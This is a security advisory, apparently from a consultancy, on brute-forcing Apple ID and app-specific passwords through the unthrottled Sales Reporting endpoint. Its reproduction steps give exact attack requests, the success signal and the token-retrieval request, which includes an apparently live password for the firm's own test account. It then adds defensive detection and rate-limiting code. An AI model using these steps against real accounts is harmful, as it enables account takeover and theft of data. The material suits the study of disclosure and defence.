AppleID Account Takeover via Brute Forcing App-Specific Password or Accounts with No 2FA



VULNERABILITY OVERVIEW

An attacker can brute-force credentials through a vulnerable endpoint of the Apple Sales Reporting service to gain unauthorized access to an account associated with an app-specific password, or to an Apple ID account without two-factor authentication (2FA) enabled. The vulnerability lies in the lack of rate limiting and the weak validation of password-based authentication at the https://reportingitc-reporter.apple.com/reportservice/sales/v1 endpoint invoked by the Reporter tool.

By sending brute-forced passwords in the jsonRequest payload, an attacker can retrieve a valid access token for the victim's Apple ID account.

When the correct password is found, the response returns an indicator asking the user to place the access token inside a properties file, which reveals that the password was correct. The attacker can then send another request carrying the same requestId (also returned as SERVICE_REQUEST_ID) from that successful response together with the valid password to retrieve the access token, allowing full access to the Apple ID account.

RISK BREAKDOWN

  • Risk: HIGH
  • Difficulty to Exploit: Medium

STEPS TO REPRODUCE

  1. Identify an account with an app-specific password or an Apple ID without 2FA:

    • Ensure the target Apple ID is using an app-specific password or has no two-factor authentication (2FA) enabled. For this POC, hello@agilehunt.com is an Apple account owned by us.

  2. Install Proxychains and configure it to route traffic through Burp Suite for request interception:

    Download and configure the Reporter tool from iTunes Partner (https://itunespartner.apple.com/assets/downloads/Reporter.zip). Set up the configuration file (Reporter.properties) with basic settings.

    Run the following command to generate a token and intercept the request:

    proxychains -f /etc/proxychains.conf java -jar Reporter.jar p=Reporter.properties Sales.generateToken

  3. Intercept the request and use the following POST request in Burp Intruder, placing the marker on the "password" parameter:

    POST /reportservice/sales/v1 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Java/11.0.21
    Host: target.apple.com
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    Content-Length: 373

    jsonRequest={"mode":"Normal","password":"$$brutepass$$","queryInput":"%5Bp%3DReporter.properties%2C+Sales.generateToken%5D","salesurl":"https%3A%2F%2Freportingitc-reporter.apple.com%2Freportservice%2Fsales%2Fv1","accesstoken":"","userid":"victim%40target.com","version":"2.2","financeurl":"https%3A%2F%2Freportingitc-reporter.apple.com%2Freportservice%2Ffinance%2Fv1"}

  4. Brute-force the password with various password combinations until a valid password is found. Observe that no rate limiting is implemented: we were able to send 500+ requests without any blocks or rate limiting and found the right password.

    Check the response for success:

    • If the response has status code 200 OK or a content length of 105 / 1267 and includes:

      "You are required to place your Access Token inside your properties file. Do you want to continue? (y/n): "

      this indicates that the brute-forced password was correct.

      Raw HTTP response:

      HTTP/1.1 200 OK
      Server: Apple
      Date: Sat, 28 Sep 2024 06:48:48 GMT
      Content-Type: text/html;charset=iso-8859-1
      Content-Length: 105
      Connection: keep-alive
      requestId: 42bff5a0-ece5-481b-bd56-50eab6bd1ffc
      EXISTING_TOKEN: Y
      SERVICE_REQUEST_ID: 42bff5a0-ece5-481b-bd56-50eab6bd1ffc

      You are required to place your Access Token inside your properties file. Do you want to continue? (y/n): 

  5. Extract requestId or SERVICE_REQUEST_ID:

    • In the successful response, note the requestId (e.g., 42bff5a0-ece5-481b-bd56-50eab6bd1ffc).

  6. Send a request to retrieve the access token:

    • Use the requestId extracted in step 5 together with the valid password in the request below to obtain the access token:

    POST /reportservice/sales/v1 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Java/11.0.21
    Host: reportingitc-reporter.apple.com
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    Content-Length: 438

    jsonRequest={"mode":"Normal","password":"dzshtqaoqeknnzeg","queryInput":"%5Bp%3DReporter.properties%2C+Sales.generateToken%5D","salesurl":"https%3A%2F%2Freportingitc-reporter.apple.com%2Freportservice%2Fsales%2Fv1","accesstoken":"","userid":"hello%40agilehunt.com","version":"2.2","financeurl":"https%3A%2F%2Freportingitc-reporter.apple.com%2Freportservice%2Ffinance%2Fv1"}&isExistingToken=y&requestId=42bff5a0-ece5-481b-bd56-50eab6bd1ffc

  7. Obtain the access token:

    • The response will contain the valid access token, granting the attacker full access to the victim's Apple ID account.
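The pattern described in the steps above (hundreds of password attempts against one userid, followed by a single response of a different, fixed length) is also what a defender can look for in server-side access logs. The following detection script is an added example, not part of this advisory and not Apple's tooling. It assumes a constructed log line format (timestamp, client IP, request line, status, response bytes, userid) and, following the advisory's observation, treats a 105-byte response body as the "correct password" indicator; the 87-byte failure length is invented for the demo.

```python
"""
Added detection example (not part of the advisory, and not Apple's code):
flag brute-force activity against the Reporter authentication endpoint from
web-server access logs.

Assumptions, all constructed for this example:
- each log line looks like
  <ISO timestamp> <client IP> "POST <path>" <status> <response bytes> userid=<email>
- a 105-byte body is the "place your Access Token inside your properties file"
  response the advisory describes, so it is treated as a correct password;
  any other length (87 here, an invented value) is treated as a wrong password.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) "POST (?P<path>\S+)" (?P<status>\d{3}) '
    r'(?P<bytes>\d+) userid=(?P<user>\S+)$'
)
AUTH_PATH = "/reportservice/sales/v1"
SUCCESS_BYTES = 105        # observed length of the success response (from the advisory)
WINDOW = timedelta(minutes=5)
THRESHOLD = 20             # failed attempts per (ip, userid) inside WINDOW that trigger an alert


def parse_line(line):
    """Parse one constructed access-log line; return None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["bytes"] = int(ev["bytes"])
    return ev


def detect(lines, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window count of failed attempts per (ip, userid).

    Emits one 'bruteforce_burst' alert when a key crosses the threshold, and a
    'success_after_bruteforce' alert when a success arrives while the window
    still holds at least `threshold` failures (a likely guessed credential).
    """
    failures = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    burst_reported = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["path"] != AUTH_PATH:
            continue
        key = (ev["ip"], ev["user"])
        window_q = failures[key]
        while window_q and ev["ts"] - window_q[0] > window:   # drop attempts outside the window
            window_q.popleft()
        if ev["bytes"] == SUCCESS_BYTES:
            if len(window_q) >= threshold:
                alerts.append({"kind": "success_after_bruteforce", "ip": ev["ip"],
                               "user": ev["user"], "failures": len(window_q)})
            continue
        window_q.append(ev["ts"])
        if len(window_q) >= threshold and key not in burst_reported:
            burst_reported.add(key)
            alerts.append({"kind": "bruteforce_burst", "ip": ev["ip"],
                           "user": ev["user"], "failures": len(window_q)})
    return alerts


def make_sample_log():
    """Constructed log lines: one legitimate user and one password-guessing client."""
    base = datetime(2024, 9, 28, 6, 40, 0)
    fmt = '{ts} {ip} "POST /reportservice/sales/v1" 200 {size} userid={user}'
    lines = [
        fmt.format(ts=base.isoformat(), ip="198.51.100.4", size=87, user="dev@example.com"),
        fmt.format(ts=(base + timedelta(seconds=30)).isoformat(), ip="198.51.100.4",
                   size=105, user="dev@example.com"),
    ]
    for i in range(25):   # 25 wrong passwords, one second apart
        lines.append(fmt.format(ts=(base + timedelta(seconds=i)).isoformat(),
                                ip="203.0.113.7", size=87, user="victim@example.com"))
    lines.append(fmt.format(ts=(base + timedelta(seconds=25)).isoformat(),
                            ip="203.0.113.7", size=105, user="victim@example.com"))
    return sorted(lines)   # ISO timestamps sort chronologically as strings


if __name__ == "__main__":
    for alert in detect(make_sample_log()):
        print(alert)
```

Keying on (IP, userid) catches a single source hammering one account; in practice you would also aggregate per userid alone, since an attacker can rotate source addresses. The "success after burst" alert is the one worth paging on: it marks an account whose credential was probably guessed, and whose access token should be revoked.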

IMPACT

  • This vulnerability allows an attacker, after a successful brute-force, to access the specific application associated with an app-specific password, or to take over an Apple ID account that does not have two-factor authentication (2FA) enabled. With a valid access token, the attacker can impersonate the victim, gain access to sensitive information, and use the account for malicious activities, including accessing Apple services linked to that account.

RECOMMENDATION

  • Enforce Strong Password Policies:

    • Implement stricter controls on password-based authentication, such as rate limits and CAPTCHA challenges after failed login attempts, to prevent brute-force attacks.
  • Enforce Two-Factor Authentication (2FA):

    • Accounts with app-specific passwords should also require 2FA as an additional security layer.
  • Add Rate Limiting on Authentication Attempts:

    • Implement rate-limiting mechanisms that block repeated failed login attempts within a short time frame to mitigate brute-force attacks.
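The rate-limiting recommendation above can be implemented as a sliding window over failed attempts with a temporary lockout. The class below is an added example, not Apple's code and not part of this advisory; it assumes an injectable clock (the `now` argument) and a constructed plaintext credential store (`DEMO_PASSWORDS`) that stands in for a real hashed-password check. It throttles on both the account and the source address, and rejects a locked key before the password is checked, so a correct guess during the lockout produces no success indicator.

```python
"""
Added rate-limiting example (not Apple's code and not part of the advisory):
a sliding-window throttle on failed password checks, keyed both per account
and per source address, with a temporary lockout once the limit is reached.
The clock is injectable (`now`) so behaviour is deterministic in tests.

The password store below is constructed for the demo; a real service would
compare against a salted password hash, not a plaintext value.
"""
import hmac
import time
from collections import defaultdict, deque

DEMO_PASSWORDS = {                      # constructed demo credentials
    "victim@example.com": "correct-horse-battery",
    "dev@example.com": "dev-password",
}


def demo_verify(account, password):
    """Constant-time comparison so timing does not leak how many characters matched."""
    expected = DEMO_PASSWORDS.get(account, "")
    return hmac.compare_digest(expected.encode(), password.encode())


class AuthThrottle:
    def __init__(self, max_failures=5, window=300.0, lockout=900.0):
        self.max_failures = max_failures     # failures allowed inside `window` seconds
        self.window = window
        self.lockout = lockout               # seconds a key stays locked after the limit
        self._failures = defaultdict(deque)  # key -> timestamps of recent failures
        self._locked_until = {}              # key -> time at which the lockout expires

    def _is_locked(self, key, now):
        until = self._locked_until.get(key)
        if until is None:
            return False
        if now >= until:                     # lockout expired: start with a clean slate
            del self._locked_until[key]
            self._failures[key].clear()
            return False
        return True

    def _record_failure(self, key, now):
        q = self._failures[key]
        while q and now - q[0] > self.window:   # forget failures outside the window
            q.popleft()
        q.append(now)
        if len(q) >= self.max_failures:
            self._locked_until[key] = now + self.lockout

    def attempt(self, account, source_ip, password, verify=demo_verify, now=None):
        """Return 'locked', 'ok' or 'bad_password'.

        A locked key is rejected before the password is checked at all, so a
        correct guess during the lockout yields no success indicator.
        """
        now = time.monotonic() if now is None else now
        keys = (("account", account), ("ip", source_ip))
        if any(self._is_locked(k, now) for k in keys):
            return "locked"
        if verify(account, password):
            for k in keys:                   # success clears the failure history
                self._failures[k].clear()
            return "ok"
        for k in keys:
            self._record_failure(k, now)
        return "bad_password"


if __name__ == "__main__":
    t = AuthThrottle(max_failures=5, window=300.0, lockout=900.0)
    for i in range(6):
        print(i, t.attempt("victim@example.com", "203.0.113.7", "wrong", now=float(i)))
    print("after lockout:",
          t.attempt("victim@example.com", "203.0.113.7", "correct-horse-battery", now=905.0))
```

Locking the account key as well as the IP key is what defeats a distributed guess against one victim; the cost is that an attacker can lock a legitimate user out, which is why the lockout is temporary and why a CAPTCHA or 2FA step-up is a better response than a hard block for high-value accounts.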

CONCLUSION

  • In today's high-stakes digital landscape, securing user accounts is paramount. This discovery emphasizes the importance of robust authentication practices and endpoint validation, and highlights the need for measures like mandatory 2FA and proper rate limiting, which AgileHunt can help implement to safeguard user accounts.

REFERENCES

For more information, check out reference [1].

WHY CHOOSE AGILEHUNT?

With more than 10 years of experience and a track record of safeguarding businesses from web vulnerabilities, Agilehunt offers:

  • Comprehensive security assessments for web applications.
  • Tailored security solutions designed to protect against attacks like Account Takeovers.
  • Proactive defense strategies to keep your business one step ahead of cyber threats.

We’ve worked with top companies worldwide to secure their applications and prevent devastating data breaches. Don’t wait until an attack happens—secure your business now.

Contact Agilehunt for a free consultation and take the first step toward safeguarding your sensitive information.